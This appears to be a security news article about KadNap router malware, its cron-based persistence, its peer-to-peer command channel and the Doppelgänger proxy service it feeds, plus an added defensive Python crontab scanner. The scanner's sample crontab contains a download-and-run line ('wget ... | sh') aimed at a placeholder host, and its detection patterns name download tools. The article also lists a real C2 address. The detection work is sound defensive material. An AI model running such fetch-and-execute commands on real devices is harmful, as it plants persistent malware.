KadNap Malware Invades 14,000+ Edge Devices, Fueling Stealth Proxy Botnet
Recent cybersecurity alerts have spotlighted a malware family named KadNap, which has infected over 14,000 devices, primarily Asus routers. First identified in August 2025, the malware has predominantly struck victims in the United States, where more than 60% of the infections have been reported.
KadNap Malware Overview
- Initial Detection: August 2025
- Devices Compromised: 14,000+
- Primary Target: Asus routers
- Geographic Spread: High infection rates in the U.S., along with cases in Taiwan, Hong Kong, Russia, U.K., Australia, Brazil, France, Italy, and Spain.
The Black Lotus Labs team at Lumen reveals that the KadNap malware leverages a customized version of the Kademlia Distributed Hash Table (DHT) protocol. This technology helps conceal the malware’s infrastructure within a peer-to-peer network, making it resistant to typical network monitoring.
How KadNap Operates
Once the malware compromises a device, it connects to a command-and-control (C2) server for ongoing communication. The C2 address identified is 212.104.141.140. Central to KadNap’s operation is a shell script called aic.sh, which initiates the device’s participation in the botnet.
The shell script installs a cron job that re-downloads a second script every 55 minutes, which keeps the infection persistent. That second script pulls down and executes a malicious ELF file renamed to "kad", enabling the full functionality of the KadNap malware.
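The persistence chain described above (a periodic cron entry that fetches a script and pipes it into a shell, which in turn drops the "kad" binary) is something a defender can look for directly in a router's crontab. The following is an added example, not code from the report or from Lumen: it parses crontab text and flags entries that combine a download tool with immediate execution, reference the file names named in the report, or contact the C2 address it lists. The sample crontab is constructed, and the C2-PLACEHOLDER host in it is a stand-in, not a real indicator.

```python
import re

# Indicators quoted in the report above; everything else here is a constructed assumption.
KNOWN_C2 = {"212.104.141.140"}
KNOWN_NAMES = ("aic.sh", "/kad")

FETCH_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
EXEC_RE = re.compile(r"\|\s*(ba)?sh\b|\bsh\s+\S|chmod\s+\+x|;\s*\./")
MINUTE_STEP_RE = re.compile(r"^\*/(\d+)$")

def parse_cron_line(line):
    """Split a crontab line into (schedule fields, command); None for comments/blank lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.split(None, 5)
    if len(parts) < 6:
        return None
    return parts[:5], parts[5]

def minute_interval(fields):
    """Return N for a '*/N' minute field (runs every N minutes), else None."""
    m = MINUTE_STEP_RE.match(fields[0])
    return int(m.group(1)) if m else None

def assess(line):
    """Return the list of reasons an entry looks like a fetch-and-execute persistence job."""
    parsed = parse_cron_line(line)
    if parsed is None:
        return None
    fields, cmd = parsed
    reasons = []
    if any(ip in cmd for ip in KNOWN_C2):
        reasons.append("known C2 address")
    if any(name in cmd for name in KNOWN_NAMES):
        reasons.append("known KadNap filename")
    if FETCH_RE.search(cmd) and EXEC_RE.search(cmd):
        reasons.append("fetch-and-execute")
    interval = minute_interval(fields)
    if interval and reasons:
        reasons.append(f"repeats every {interval} min")
    return reasons

def suspicious_entries(crontab_text):
    """Map each flagged crontab line to its reasons; benign entries are omitted."""
    out = {}
    for line in crontab_text.splitlines():
        reasons = assess(line)
        if reasons:
            out[line.strip()] = reasons
    return out

SAMPLE_CRONTAB = """
# constructed sample: one benign entry, one modelled on the aic.sh behaviour
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/55 * * * * wget -q -O - http://C2-PLACEHOLDER/aic.sh | sh
"""
```

On a live router the input would be the output of `crontab -l` or the contents of the cron spool directory; any hit warrants pulling the referenced script for analysis rather than just deleting the entry.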
Technical Capabilities
- Targeted Architectures: ARM and MIPS processors
- Malicious Activities:
  - Connects to a Network Time Protocol (NTP) server to fetch the current time.
  - Generates a hash used for peer discovery in the decentralized network.
  - Closes port 22, the port used for Secure Shell (SSH) access.
  - Extracts a list of C2 IP addresses and ports.
Lumen notes that the use of a DHT lets KadNap maintain command channels that are hard to disrupt, because its peer-to-peer traffic blends in with legitimate traffic.
Doppelgänger Proxy Service
The KadNap malware is monetized through a proxy service called Doppelgänger, operating via the site doppelganger.shop. This service, described as a rebrand of a previous proxy operation linked to the TheMoon malware, claims to provide "100% anonymity" with residential proxies in over 50 countries. It reportedly began operations around May or June 2025.
Recommendations for Users
To combat the threat posed by KadNap, users with SOHO routers should take the following precautions:
- Keep devices updated.
- Reboot devices regularly.
- Change default passwords.
- Secure management interfaces.
- Replace outdated models that are no longer supported.
In conclusion, the KadNap botnet stands apart from other anonymous proxy networks in its use of a peer-to-peer network for decentralized control, which makes detection challenging. As the situation evolves, vigilance remains crucial for users to protect their devices.